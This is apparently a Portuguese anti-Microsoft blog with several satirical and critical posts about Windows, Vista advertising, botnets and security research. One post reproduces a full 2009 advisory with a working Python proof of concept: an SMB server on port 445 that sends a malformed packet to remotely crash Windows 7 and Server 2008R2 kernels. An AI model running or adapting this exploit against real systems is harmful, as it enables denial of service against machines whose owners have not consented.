NICE...

AVG, mata vírus Windows com LINUX!

Que ironia do destino!

Claro que não é novidade alguma. Já por aqui andou um post da autoria de Port25 o tal site "open-source" da M$ onde receitavam GNU/Linux para recuperar um sistema Windows.

No meio disto tudo fica a dúvida - porque não tratar de vez com os problemas do Windows!?

Sim, exactamente com os produtos que a AVG e Port25 recomendam - LINUX!

ARRASAR BOTNETS!?

Nope. Pelo menos da forma como alguém queria.

Apesar do fecho à força de Zeus, Mariposa, Lethic e Waledac as estatísticas mais recentes mostram que de nada valeu este esforço.

É um verdadeiro engano e na verdade apenas a melhoria dos programas poderá atenuar os efeitos devastadores que estas pragas provocam. Porque é que em vez de gastarem milhões em cima de milhões em vãs perseguições, porque não corrigem o que está podre?

Porque não sabem?

Porque não podem?

Porque o produto é uma treta e tem mais buracos que um queijo suíço?

Pode ser que assim seja mas quem vende um produto tem que se assegurar que esse produto oferece segurança!

Alguém já imaginou um fabricante de fechaduras lançar no mercado uma fechadura de segurança que abre com um palito?

E alguém consegue imaginar que esse fabricante ande a perseguir os ladrões em vez de melhorar a chave!?

Como se costuma dizer - a oportunidade faz o ladrão!

Um deste casos mais evidentes é o da M$ a tentar tapar o Sol com uma peneira ao derrubar legalmente Waledac.Ou seja, ao invés de melhorar os seus produtos anda entretida numa caça às bruxas. Como era de prever, a eficácia das acções da M$ parecem não valer de nada. Infelizmente, tal já não será novidade nenhuma para aqueles lados de tão habituados estarem a não obterem qualquer resultado na melhoria da segurança dos seus produtos. Como não conseguem activamente fazer melhor atiram-se a um faz-de-conta-que-estamos-a-combater estes "gajos" que estragam a vida dos utilizadores. Pior ainda, é quando esse faz-de-conta não fica apenas pela perseguição às botnet mas passa directamente a bola para os consumidores tentando obrigar os governos a cobrar uma taxa a TODOS os utilizadores e a colocar de quarentena aqueles com computadores infectados(*).

Ora, no meio de todas estas notícias diárias, é raro aparecer um jornalista, dos verdadeiros e não aqueles do copy-paste e de outros com alguns interesses meio escondidos, que chame os bois pelos nomes especialmente quando se referem a "computadores" ou "PC's" infectados. Felizmente, apesar da raridade, lá aparece sempre alguém que trata de referir que as vítimas são tipicamente utilizadores Windows (embora "tipically" seja um pouco brando não deixa de ser assinalável quando espalhado pela (M$)BBC News) o que assenta perfeitamente na realidade e, doutra forma, retira a ambiguidade dos termos "computador" e/ou "PC" que a grande maioria dos "jornalistas" da treta tem por hábito usar. Tentem lá fazer um pequeno esforço, pelo menos todos aqueles que não recebem ACER Ferrari ou algo do género, e não se esqueçam do Windows a seguir a "PC" ou "computador", ok?

(*) - Posso dizer que concordo com esta opinião. Façam pagar, e bem!, e ponham de quarentena, por mim até iria mais longe e exigiria pena perpétua, os utilizadores infectados. Mas apenas os infectados já que os outros não tem culpa nenhuma das centenas de milhões de tansos que por aí andam.

(MOST SECURE OS EVER) - REDMOND, WE'VE GOT A PROBLEM.

Big problem!

Como não vejo qualquer outra forma de colocar aqui o problema sem ir preso devido a um aborto de Lei que por aí anda, Lei 109/2009 de 15 de Setembro, nem tampouco dizer se já experimentei ou não já que qualquer tentativa dá direito a uma pena mais severa que à dada (ou deveria dizer não dada?) aos ladrões de cartola que agora aparecem diariamente aos montes a meter a mão a milhões, irei transcrever na íntegra um grande problema que se afecta todos aqueles que utilizam Windows 7 e Server 2008 RC2 e também todos aqueles que o utilizarão até ao dia em que a M$ se importe verdadeiramente com os seus utilizadores e deixe de pensar apenas na carteira dos seus investidores.
Sem mais delongas:

"This bug is a real proof that SDL #FAIL
The bug trigger an infinite loop on smb{1,2}, pre-auth, no credential needed...
Can be trigered outside the lan via (IE*)
The bug is so noob, it should have been spotted 2 years ago by the SDL if the SDL would have ever existed:

netbios_header = struct.pack(">i", len(''.join(SMB_packet))+SMB_packet
(The netbios header provide the length of the incoming smb{1,2} packet)

If netbios_header is 4 bytes smaller or more than SMB_packet, it just blow !
WHAT ?? you gotta be kidding me where's my SDL ?!?

"Most secure Os ever";
What ever your firewall is set to, you can get remotly smashed via IE or even via some broadcasting nbns tricks (no user interaction)
How funny.

Advisory:

=============================================
- Release date: November 11th, 2009
- Discovered by: Laurent Gaffié
- Severity: Medium/High
=============================================

I. VULNERABILITY
-------------------------
Windows 7 * , Server 2008R2 Remote Kernel Crash

II. BACKGROUND
-------------------------
#FAIL,#FAIL,#FAIL
SDL FAIL, 'Most Secure Os Ever' --> Remote Kernel in 2 mn.
#FAIL,#FAIL,#FAIL

III. DESCRIPTION
-------------------------
See : http://g-laurent.blogspot.com/ for much more details

#Comment: This bug is specific Windows 7/2008R2.

IV. PROOF OF CONCEPT
-------------------------
#win7-crash.py:
#Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop)
#Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure() caused by an #infinite loop.
#NO BSOD, YOU GOTTA PULL THE PLUG.
#To trigger it fast; from the target: \\this_script_ip_addr\BLAH , instantly crash
#Author: Laurent Gaffié
#

import SocketServer

packet = "\x00\x00\x00\x9a" # ---> length should be 9e not 9a..
"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"


class SMB2(SocketServer.BaseRequestHandler):

def handle(self):

print "Who:", self.client_address
print "THANKS SDL"
input = self.request.recv(1024)
self.request.send(packet)
self.request.close()

launch = SocketServer.TCPServer(('', 445),SMB2)# listen all interfaces port 445
launch.serve_forever()



V. BUSINESS IMPACT
-------------------------
An attacker can remotly crash any Windows 7/Server 2008R2
on a LAN or via IE

VI. SYSTEMS AFFECTED
-------------------------
Windows 7, Windowns Server 2008R2

VII. SOLUTION
-------------------------
No patch available for the moment, your vendor do not care.
Close SMB feature and ports, until a real audit is provided.

VIII. REFERENCES
-------------------------
http://blogs.msdn.com/sdl/

IX. CREDITS
-------------------------
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com

X. REVISION HISTORY
-------------------------
November 8th, 2009: MSRC contacted
November 8th, 2009: MSRC acknoledge the vuln
November 11th, 2009: MRSC try to convince me that multi-vendor-ipv6 bug shouldn't appears on a security bulletin.
November 11th, 2009: Win 7 remote kernel smash released

XI. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.

XII.Personal Notes
-------------------------
More Remote Kernel FD @MS to come. "

Quanto ao facto de eventualmente (*) isto não se poder fazer em Portugal, esse tal país que é um assombro Tecnológico mas que castra toda e qualquer investigação nesta área com uma porcaria copiada de alguém que não deveria servir de exemplo, aproveito para deixar aqui um comentário que pode servir a quem de direito:
- "That's the cost of security by obscurity and propaganda.
Like it or not, it's like that."

NOTA: o "bold" e letra vermelha são da responsabilidade do dono desta tasca, com a intenção de chamar a atenção para partes que são deveras importantes e a reter.

(*) - Apenas eventualemente. Alguém com conhecimentos jurídicos poderá informar melhor acerca desta coisa a que resolveram chamar de Lei. Segundo aquilo que consigo ler no Artigo 4º é uma mera tentativa de estourar um programa dá "direita" a uma punição!
Ou seja, meninos não estudem informática porque o nosso querido desgoverno não vos deixa fazer nada excepto pagar o imposto M$!

PS1: Se não perceberam bem o que se está a passar leiam os posts anteriores de Laurent Gaffié. Andava para aqui calado à espera do que isto iria dar já que suspeitei desde o 1º momento do facto do Windows 7 e Server RC2 estarem livres do bug do SMB.2 já aqui narrado. Como é óbvio também fiquei à espera do remendo da M$ que lá acabou por aparecer na tradicional data que a M$ estipula para estas coisas e, não a título excepcional como seria forçoso que tal acontecesse mais cedo, como um "sábio" da M$ aqui tentou transmitir só que recusado devido à sua alma de carroceiro. Bem, como é hábito, foi pior a emenda que o soneto tal como a M$ já nos vai habituando a estas coisas - remendos de remendos de remendos de remendos. Ah!, e nesta última actualização de (cof... cof... cof...) "segurança" há mais um grave erro mas isso fica para amanhã e após ter a certeza de qual o procedimento correcto.

PS2: Não mudem para SO's de jeito não.

(disclaimer: este conselho não se destina aos meninos que apenas usam o computador para se armarem em piratas dos sete mares, brincar aos soldadinhos, génios do futebol e afins. Apenas se destina a pessoas responsáveis - BUSINESS IMPACT, see?)

NOVIDADES DO 7...

Sem dúvida alguma que uma das grandes novidades do 7 é o multi-touch. Só que, como é habitual, a "qualidade" destas coisas tem a marca da M$.

ooopppsss

"Raisparta" este Sony Vaio?

oooopppsss

Desculpem, estou tão excitado que tenho os dedos molhados?

Já agora, importa-se de repetir esse bocado em que fala da Apple?

Ah!, já percebi. Pelo menos lá trabalha, não é?

DIGAM LÁ SE LINUS NÃO TEM SENSO DE HUMOR...

Roubada daqui.

(edit) - Distraio-me por um bocadinho e o Carlos Martins ultrapassa-me novamente...

SÓ PARA DESANUVIAR...

Link.

ANEDOTÁRIO DE FIM-DE-SEMANA

Durante o período de uma semana as anedotas são aos montes mas há sempre uma que se distancia das outras quer pelo facto de ser realmente uma daquelas anedotas que até mandam um gajo para o hospital com cãibras nos abdominais quanto pelo insólito da questão.
O autor deste blog decidiu eleger semanalmente a tal anedota que se sobressai no meio de muitas outras e para este Domingo, dia de eleições nos Açores, a que realmente deu motivo para uma risota despregada  e a uma estupefacção de tal grandeza que até o queixo bateu no esterno foi uma notícia no Diário Digital com o seguinte teor:
-"Consumidores Mac pagam «taxa Apple», acusa Microsoft"

Afinal parece que não é apenas o actual líder a fazer rir o pessoal com as suas palhaçadas. Está-me a parecer que a M$ Portugal também tem por lá uns bons artistas...

PS: Opto por sistemas livres e abertos e as guerrinhas entre os dois apenas me tornam o sono mais leve.

OS RATOS COMEÇAM A ABANDONAR O BARCO...

Hoje tinha reservado um pouco do meu precioso tempo para escrever uma carta a Nellie Kroes para tentar descrever a recente volta de Steven Ballmer e pelo investimento em centros de pesquisa que apenas por rara coincidência se tratam justamente daqueles que repentinamente mudaram de um Não ao OOXML para um Sim. Claro que iria frisar que os milhões a investir na Noruega, Alemanha, França e Inglaterra são apenas fruto de uma incrível coincidência, como tantas outras que vem à tona sempre que se fala da M$ e seus acólitos.
Claro que os acólitos também não poderiam faltar e neste caso acontece mais uma daquelas extraordinárias coincidências com a parelha M$ / J. P. Sá Couto (*). E a coincidência também pouco terá a ver com a participação do enviado e$pecial desta empresa junto do comité nacional que "avaliou" o mesmo OOXML. Também é apenas uma estranha coincidência estas duas empresas estarem a ser acusadas de graves crimes em que uma, M$, já foi devidamente acusada julgada e considerada culpada.

Mas, entretanto aconteceu algo que me obriga a deixar essa carta para amanhã e aproveito o meu tempo para rever alguns exercícios de futurologia que aqui o je, aprendiz de feiticeiro, engendrou em algumas ocasiões como por exemplo:

- PALAVRAS ABENÇOADAS; (note-se a referência ao Google para além do atropelo dos direitos humanos por parte dos investidores)
- O FUTURO DO LINUX;
- M$ + RED HAT ?!; (note-se a menção ao Google e já agora à participação especial de um comentador por demais conhecido)
(lamentavelmente, os 3 primeiros parágrafos perderam qualquer sentido e o link já não existe)
- UM DIA A CAÇA VOLTA-SE CONTRA O CAÇADOR.

Depois de passar em revista estes meus posts lá me veio outra vez a habitual crise de remorsos - Merda, detesto quando tenho razão!

Chegado ao dia 8 de Outubro do Ano da Graça de 2008 eis que David Einhorn, um dos mais famosos gestores de fundos e que anunciou a desgraça que iria ocorrer com o colapso da Lehman Brothers uns bons meses antes desta acontecer (outro bruxo...), abandonou o barco da M$ onde se cotava como um dos mais importantes investidores. Segundo as suas palavras:
- "Since then, management has acted in an overaggressive and almost panicky fashion regarding its online offering.  First, it sought to acquire Yahoo! and then after that failed, it announced extremely high internal investment requirements to pursue this “huge” opportunity (read: “Google-envy”).  We doubt the opportunity is what they say it is and wish MSFT focused on its core strength: software.

The CEO is a very smart and very wealthy man.  Perhaps, he is so wealthy that he has bigger ideas and aspirations than making MSFT’s shareholders wealthier.  We’ve given up on MSFT for now as we feel better investing in companies where management at least appears to be trying to work for shareholders.

We share the concern about Microsoft's online investment, which we continue to believe is going nowhere. (We think Microsoft should just spin what's left into Yahoo.)  We do think that Steve made the right call about Yahoo, however. We continue to think that deal would have been a disaster."

Pois é. O que é que acontece quando um barco começa a dar os primeiros sinais de se estar a afundar?
Embora os ratos andem a fugir é claro que a M$ não se vai afundar, pelo menos por agora, mas o que é realidade é que o desvario acampou lá para os lados de Redmond.
Mas, o que é mais estranho nesta fuga é que não consigo imaginar porque é que um grande e notório investidor se pira da M$ apenas por uma coisinha tão trivial como esta?
Será que Steven Ballmer anda a gastar assim tanto com a sua obsessão!?

Realmente a M$ anda envolvida em várias lutas e em várias frentes e o ultrapassado método Ballmeriano, a la ditador do Terceiro Mundo, não contribui em nada para a saúde financeira do monopólio e aí sim digo - felizmente!

O que é facto é que as constantes lutas e o desvario que grassa por aqueles lados apenas tem contribuído para a M$ saia cada vez mais fragilizada após cada borrada que faz e a quantidade delas nos últimos tempos é impressionante, principalmente a Grande Bosta que é o Me2, derrota aliás já reconhecida pela própria M$ - ainda recentemente o XP viu a sua data de validade aumentar em mais seis meses e o anúncio do Windows 7 em ser antecipado para o próximo mês.

Puxa, até parece que a M$ é a representação do Inferno. Não, nada disso. Nem tudo é mau lá para aqueles lados e até tem muitas coisas boas para mostrar o quanto valem em inovação tecnológica, como por exemplo os ratos, a "tal" mesa de bar, ehemm, ahamm, os ratos, huuummm, aquela mesa de taberna, e ..., ah!, eureka!, os anúncios publicitários!
Tal como este retirado daqui:

"PDC 2008, (**) Windows 7 is coming and I can't wait",
yeah!

"seven is my magic number",
wow!

"you can't win with another system made for losers" (eles lá sabem...)
ahhhhh... ahhhhhh... ahhhhhhhh...
Desculpem, amanhã continuo...
ahhhhh..., ahhhhh...

(*) - Muito antes do Magalhães...
Fica para um próximo post.

ahhhhh..., ahhhhhhh...,

(***) - Ui que site tão, tão nem sei como é que hei-de dizer..., tão mal parido e com uma cor que me faz lembrar..., huummm, deixem-me cá ver, hummmmm, o UBUNTU!
E ainda uma outra coisa que de momento não me consigo recordar...
Este site é uma verdadeira montra das capacidades tecnológicas que a M$ possui actualmente...
Aquilo a que se pode chamar um genuíno Choque Tecnológico!

iiihhhhh..., iiiiihhhh....,

PS: Por falar em anúncios publicitários, já alguém reparou que em mais de
99,99% dos anúncios dos 300 milhões de USD não aparece qualquer menção
"aquela coisa que agora apenas um número cada vez mais reduzido de
ludibriados ainda teima em chamar de SO"?

ehhhh..., ehhhhh..., ehhhhh,

I'M A PC IN A MAC

Não há forma de acertar em nenhuma!
Depois do fenomenal fracasso das tentativas anteriores, Mojave e Seinfeld, eis que aparece uma nova campanha que ilustra perfeitamente a fantástica qualidade dos produtos da M$ principalmente aquela espécie de SO e programas de edição de imagem.

Claro que a M$ nunca poderia exigir aos publicitários que estes utilizassem um PC com o Me2 e algum dos seus programas de edição de imagem ou de vídeo, pela simples razão que caso o fizessem só lá para o ano de 2225 é que conseguiriam acabar tal anúncio e mesmo assim com alguns problemas!

Apesar de, durante a noite, terem alterado a verdadeira origem dos ficheiros fica aqui e mais em alguns sítios para memória futura que os anúncios foram executados num Mac utilizando Adobe Creative Suite 3!

Que grande bronca!

Não há mesmo maneira de acertar uma!

Na Apple deve andar tudo à gargalhada e talvez a pensar em refazer a história e quem sabe a pensar em mandar uns vídeos a gozar com toda esta situação.
Acresce que no caso de Seinfeld toda a gente sabe que ele usa no dia-a-dia um Mac e que já tinha entrado nalguma publicidade da Apple...

Tantos milhões atirados pelas janelas fora...

Lido aqui.

PS: Um update acrescenta que também o som foi editado num Mac só que esta "boca", tratando-se de m anónimo pode não ter valor algum.

ASSIM TEM GRAÇA

Um final verdadeiramente à medida!

THINK DIFFERENT

Sabem qual a diferença entre o Jerry Seinfeld dos finais dos anos 90 do milénio anterior e o Jerry Seinfeld de agora?

A diferença está no gosto. Nos finais dos anos 90 gostava de maçãs e agora gosta de janelas. (*)

E sabem quais os motivos que originaram esta louca, súbita e brusca mudança de gostos?

Para aí uns 10 milhões de MU$D!

Ah!, e parece que o lema vai ser "janelas não muros" (Windows not walls). Esta das paredes/muros deverá ter algo a ver com a Apple embora eu não consiga lá muito bem entender o que é. Fico a aguardar para ver como se safam.
A M$ decerto saberá do que está a falar mas aqui fico com uma grande questão - num mundo de verdes espaços, livre, aberto e sem paredes/muros onde se colocam as janelas!?
Ou, para que servem!?

Como me identifico perfeitamente com as palavras que são proferidas no vídeo da Apple, aqui ficam para memória futura: (**)

Here’s to the Crazy Ones.
The misfits.
The rebels.
The troublemakers.
The round pegs in the square holes.
The ones who see things differently.
They’re not fond of rules.
And they have no respect for the status quo.
You can praise them, disagree with them, quote them, disbelieve them, glorify or vilify them.
About the only thing that you can’t do, is ignore them.
Because they change things.
They invent. They imagine. They heal.
They explore. They create. They inspire.
They push the human race forward.
Maybe they have to be crazy.
How else can you stare at an empty canvas and see a work of art?
Or, sit in silence and hear a song that hasn’t been written?
Or, gaze at a red planet and see a laboratory on wheels?
We make tools for these kinds of people.
While some may see them as the crazy ones, we see genius.

Because the ones who are crazy enough to think that they can change the world,
are the ones who do.

Ui!, como este texto se adapta tão bem, mesmo tão bem ao Software Livre e Aberto...
Cá para mim, naquela altura o pessoal da Apple devia andar nos ácidos ou então a sonhar com castelos no ar. Tantas boas intenções que acabaram em ditaduras...

(*) - Acho que não é bem assim pois segundo algumas bocas ele efectivamente usa no dia-a-dia - um Mac!

(**) - PS: Tinha para aí uns 20 sítios abertos quando copiei este texto. Entretanto, por descuido, fechei esse site e nunca mais o encontrei. Se alguém se sentir lesado agradeço o favor de me contactar que restaurarei o merecido link.

MALWARE SCAM SUPER-PROFISSIONAL!

Há gajos que inventam tudo para enganar os pobres utilizadores!
Este artigo explica de uma forma excelente a "anatomia" de um desses vermes que por aí abundam.

Felizmente, quem usa boas ferramentas de detecção de malware pode ser avisado a tempo do que se está a passar.

Infelizmente:

"As a final experiment I decided to see if I could remove the malware,
or at least detect it, with legitimate anti-malware software. At first
I attempted with the recently updated Microsoft Malicious Software
Removal Tool (from June 24, 2008, the most recent available at the time
I wrote this). It failed to detect the software."

Penso que será escusado dizer em que produtos estas coisas acontecem...

SÓ ESPERO QUE DÊ CERTO!

A M$ vai finalmente tentar combater a pirataria!
Desta vez, dizem eles que é a sério mas já não é a 1ª vez que dizem o mesmo...
Mas se alguém está à espera que esses "paladinos" da luta anti-pirataria o façam em relação ao Me2, podem tirar o cavalinho da chuva pois de momento apenas lutarão contra a ilegalidade do XP. Isto é um pouco estranho e provavelmente será mais uma coincidência que esta acção seja tomada quando a M$ anda toda preocupada em estourar com 300 milhões de USD só para impingir o "espécie de SO". (*)
Quero é ver o que é que eles vão tentar "oferecer" para o pessoal ficar legal já que tenho quase a certeza que irão tentar a toda a força que o pessoal engula aquela coisa que parece um SO.

Sinceramente, desejo-lhes toda a sorte do mundo e que consigam efectivamente obrigar o pessoal a pagar o que usa. Como é óbvio, isto só se aplica a quem opta por viver dentro de umas janelas já que quem optou por se libertar das grilhetas do software proprietário escusa de estar com receios.

Despeço-me, com votos ardentes que esta acção seja 100% eficiente.
É ilegal?
Pimba!
Em vez de um ecran azul desta vez fica preto. Pode-se mudar as definições mas passados 60 minutos lá fica preto outra vez. Penso que para milhões de utilizadores não é nada de estranho já que a frequência dos azuis deveria andar por aí - 60 minutos e tumba!

Também espero que a M$ não enfie de novo o mesmo barrete que enfiou quando andou a tratar como criminosos milhares de utilizadores de software legal. Claro que quem tem sempre a culpa é o utilizador e neste caso até concordo com o pessoal da M$ - quem é que os mandou comprar o Me2!?
Depois puseram-se a berrar - "ah! e tal a M$ anda-nos a tratar mal"

(*) - Algum desse ouro já foi estourado com o "Mojave". Pôrra, aquilo teve cá um impacto!
Agora segue-se um gajo que eu até adorava - Seinfeld...

PS: Será que a seguir iremos ver Office, Photoshop, AutoCad e afins a irem pelo mesmo caminho?
Espero bem que sim!

VÍRUS IN SPACE!

Ora, ora. Lembram-se de levar uns computadores com eles e depois dá nisto. Até no espaço o raio dos computadores são afectados com vírus!
Quem lhes mandou andar agarrados às janelas!?
Bem feito!

Já agora, aproveitem para constatar que nem os ladrões querem o Me2/espécie de SO!

TANTOS ANOS DE PREPARAÇÃO PARA OS JOGOS OLÍMPICOS...

Apenas ontem consegui completar a minha visualização da cerimónia de abertura dos Jogos Olímpicos.
Fui vendo aos poucos deleitando-me com o espectáculo que foi proporcionado aos meros mortais deste planeta que dá pelo nome de Terra. É que foi mesmo um enorme deleite assistir a esta mostra proporcionada por uma China que dispensa qualquer apresentação quando se refere Cultura.
Se por um lado este espectáculo teve o condão de me fazer esquecer por uns momentos as terríveis atrocidades que por lá são cometidas por outro realçou e aumentou a minha repulsa pela hipocrisia humana. Durante cerca de 4 horas parecia que todo o mundo estava em paz e, o que é mais repugnante, ver toda aquela gente a apaparicar os responsáveis chineses como se a democracia tivesse sido implantada neste curto espaço de tempo. Noutras alturas em que os habitantes e dirigentes deste Planeta ainda os tinham no sítio (*) estaríamos com toda a certeza a assistir a um tremendo boicote a estes jogos e esta super-deliciosa-apresentação não passaria de um mero fogo-fátuo nos anais da história.

Porém, nem toda a gente ficou impávida e serena a assistir ao espectáculo e pelo menos num inusitado espaço dentro deste estádio assistiu-se a um foco de luta que quase poderia considerar como um boicote. Quase...
O momento escolhido não poderia ter sido o melhor e foi exactamente no momento em que Li Ning dava a volta à cobertura do estádio com a chama olímpica que o absurdo aconteceu!
Muito mais surpreendente terá sido esse foco vir de alguém que eu consideraria completamente fora de questão. Finalmente tive que me render à evidência de provas tão evidentes e confirmadas !
Tantos anos e tanta preparação. Tantos milhares de figurantes que andavam para ali a cumprir como um metrónomo os gestos tantas vezes repetidos até à exaustão sob pena de uma minúscula falha poder ditar severas punições ou mesmo custar a própria vida. Tantos anos de treino para que tudo correse de forma imaculada para que num súbito lampejo de boicote a toda esta magnificiência alguém se tenha empenhado com tanta alma e coração a resistir aos canônes estipulados.

Por esse motivo, resta-me com toda a minha alma e coração bradar bem alto:

Parabéns M$!

(*) - com as devidas desculpas para o meu sexismo mas decerto compreenderão...

BUUUMMM!!! F1 / CEGUETA AO FUNDO ??!!

Trabalho publicado.
Também há código para sacar.
Até slides!

Para todos os gostos!

Eles e eu não queremos que vos falte nada!

Veremos como a M$ reage. Quanto a mim tenho a certeza que "isto é só teoria", "nem pensar numa coisa destas", "já arranjamos um remendo", ou algo do género.

Ah!, também pode reconhecer o erro mas, neste caso, irá mais uma vez acusar o utilizador.

E daqui a um bocado talvez tenha para aqui umas visitas de uns "Caros" a acusar-me de mentiroso, que não estou a ajudar o Linux em nada, ou a bradar aos céus que qualquer SO pode ser vítima de um ataque deste género já que a culpa é da arquitectura x86.

Para os meus "amigos" trolls e astroturfers, aviso desde já que tenho algumas dificuldades em acreditar nisto já que me parece ter sido difícil teorizar mas muito mais difícil de colocar em prática. Também fico atónito se o Me2, apesar de ser uma grande porcaria, não tiver um nível mais elevado de protecções não só para se proteger a si próprio (*) como também o utilizador.
Pode ser exequível e aí é um salve-se quem puder mas resta aos M$-agarrados a esperança que não passe mesmo de uma teoria.

Apesar de estarem apenas os Windows (**) em questão tenho quase a certeza absoluta que já está muita gente da comunidade a ver o que se passa ao nível do SL/A.

(*) - Esta foi sempre uma grande preocupação da M$ enquanto mandava o utilizador à merda. Já escrevi por aqui que a M$ estava a cometer um grande erro e que também devia pensar em proteger muito mais utlizador mas realmente a única coisa que a M$ vê nos seus utilizadores é apenas os $$$$.

(**) - Parece-me que todos...

BOOOMMM, ERA UMA VEZ A SEGURANÇA DO Me2!!!???

Ainda agora começou o maior evento mundial acerca de segurança - Black Hat e nos briefings começam a aparecer os primeiros sinais de nuvens negras que ameaçam uma enorme tempestade para o exército da M$.

Até pode ser que não seja nada e que alguém ande a aplicar o veneno que a M$ costuma aplicar aos outros - FUD - mas tudo indica que esta tempestade possa vir a tornar-se num caso sério.

Por enquanto é preferível não levantar muita poeira e esperar a resposta da M$ mas de qualquer forma acho que é conveniente salientar algumas das frases e respectivos links para esta brutal notícia!

"Researchers who have read the paper that Dowd and Sotirov wrote on the techniques say their work is a major breakthrough and there is little that Microsoft can do to address the problems. The attacks themselves are not based on any new vulnerabilities in IE or Vista, but instead take advantage of Vista's fundamental architecture and the ways in which Microsoft chose to protect it."

""The genius of this is that it's completely reusable," said Dino Dai Zovi, a well-known security researcher and author. "They have attacks that let them load chosen content to a chosen location with chosen permissions. That's completely game over. (...)""

""This is not insanely technical. These two guys are capable of the really low-level technical attacks, but this is simple and reusable," Dai Zovi said. "I definitely think this will get reused soon, sort of like heap spraying was.""

Como A M$ tem lá um exército, outra coisa não seria de esperar(!), e pelos vistos andam todos alegres ou todos excitados, pode ser que dentro de pouco tempo se saiba realmente o que se passa. Por enquanto, é melhor esperar pela resposta do pessoal de Redmond.

Contudo, tenho cá para mim que a M$ já sabia o que se passava e desta forma não estranho o súbito amor que começou a ter por alguns parceiros que até agora tratava abaixo de cão.

Num outro site não fazem por menos e abrem a notícia desta forma:
"This week at the Black Hat Security Conference two security researchers will discuss their findings which could completely bring Windows Vista to its knees."

Vou esperar para ver se os piores receios acerca de uma coisa que muitos continuam a afirmar que é um SO se materializam ou não.

PS: Onde há fumo há fogo...

CAMBADA DE IGNORANTES! (TRANSCRIÇÃO DOS COMENTÁRIOS - 1)

Para todos os que não querem perder muito tempo a ouvir os depoimentos dos envolvidos deixo aqui uma transcrição mais ou menos fiel de tudo o que individualmente disseram. Note-se que me parece que tem havido uma pequenas alterações no preenchimento dos quadros e que estes comentários dizem respeito apenas a este dia e a esta hora:

1. Parece fácil, não tenho que ler um livro com 77 páginas, parece que está tudo ali, parece fácil; Parece não parece? E "ser", não é nada!? Estou admirado. Ó pessoal da M$, isso foi tão fraco que até o parece conta!?

2. (demonstração do Media Center)
Wow, quanto é que isso custa?
(é grátis)
Não acredito!
Acredita pá. É gratuito. Só tens que dar umas centenas largas pelo Ultimate.

3. Oh!, e fizeram uma caixa de propósito para isto!?
O que é que tem dentro da caixa?
Um tijolo?
Querida, quem parece ter um tijolo és tu! Na cabeça!

4. É castanho. Castanho. Não é aquele habitual azul. É castanho. Castanho é a minha cor preferida. Gosto muito de castanho.
pppsssttt, M$, a merda também é castanha... Mais um que conta para o sucesso!? Estão mesmo desesperados!

5. É rápido. Não é preciso ser-se "Dr." ou algo do género para se fazer essas coisas...
Espera aí! Por Onde é que tens andado, pá? Estás a dizer que é preciso ser-se doutor para ver uns filmes ou lidar com alguns ficheiros grandes!? Pôrra, este gajo deve ter comido uma maçã envenenada e só ter acordado após o beijo da vendedora da M$.
(sim é rápido, muito rápido a lidar com filmes e grandes ficheiros)
Grande ajuda a gaja da M$. Sózinho o gajo não conseguiria explicar porque é que se tem que ser doutor para lidar, por exemplo, com o XP (só para ficar dentro de casa...) E, afinal, é preciso realçar o que o cliente diz? A "Ajuda" já não vem num menu e agora vem em carne e osso sentar-se ao nosso lado!? Colocam a foto da "ajuda" na embalagem para a gente escolher? Podem colocar na net as amostras disponíveis? Se for boa, eu vou a correr comprar um Ultimate!

6. É uma coisa sexy!
(e porque é que diz que é sexy?)
Não sei. Fico com a sensação que (...). Não sei.
É cada um! Vai mas é tratar-te. Deves ter um grande problema. Primeiro dizes que um programa de computador é sexy. Depois dizes que não sabes porquê! Deve ser o Amor! Será que estás a pensar em pedir namoro aquela coisa e provavelmente casar com aquilo? Nem com mais uma vista - o Amor cegou-te!

7. Amigo do utilizador.
Onde é que eu já ouvi isto!? Esta soou-me a alguém que recebe o salário de uma firma de Redmond...
Gosto da busca. A busca é rápida e quando me lembro da calculadora...
Onde está?
Está aqui?
Está acolá?
Esta é de mais. Da próxima vez que fores à busca tens que fazer - "Onde é que está a minha cabeça!?"

8. (Não é o Mojave)
Oh! ok
(É o Vista)
A sério!?
Está a ver?
Já viu quanto é que eu percebo disto?
Nada!
Ok. Isto também é apenas para burros e ignorantes. Agora que viste isto já ficaste inteligente. Quando o utilizares então passarás a uma Einstein! Não te preocupes que tens emprego garantido nos laboratórios da M$. Vais ver como te sentes em casa.

9. O meu marido já tinha ficado desesperado e frustrado com o Me2, não o quer para nada e eu nem lhe toco.
(Este é o Vista)
Oh, sim? eh... eh... eh...
Talvez a culpa seja do utilizador? ih... ih... ih...
Em vez da aplicação? ih... ih... ih...
Vai-te rindo vai. Quando chegares a casa o teu marido vai-te pôr a instalar e resolver os problemas do Me2. Depois vais-me dizer, e a toda a gente o resultado, ok?

10. - Ai sim?
Interessante.
Wow, wow.
Penso que se deve utilizar.
É o exemplo de que a percepção difere da realidade.
Ah, sim? Que SE deve utilizar? Quem é o SE? Ah sim, todos menos tu! Espertinho, hem? E já agora qual é a realidade que viste numa demonstração de 10 minutos? Viste Deus!? ALELUIA!

11. Wow.
Isto é que é o actual Vista?
Wow.
Melhor, muito melhor do que aquilo que me disseram, a percepção de outras pessoas...
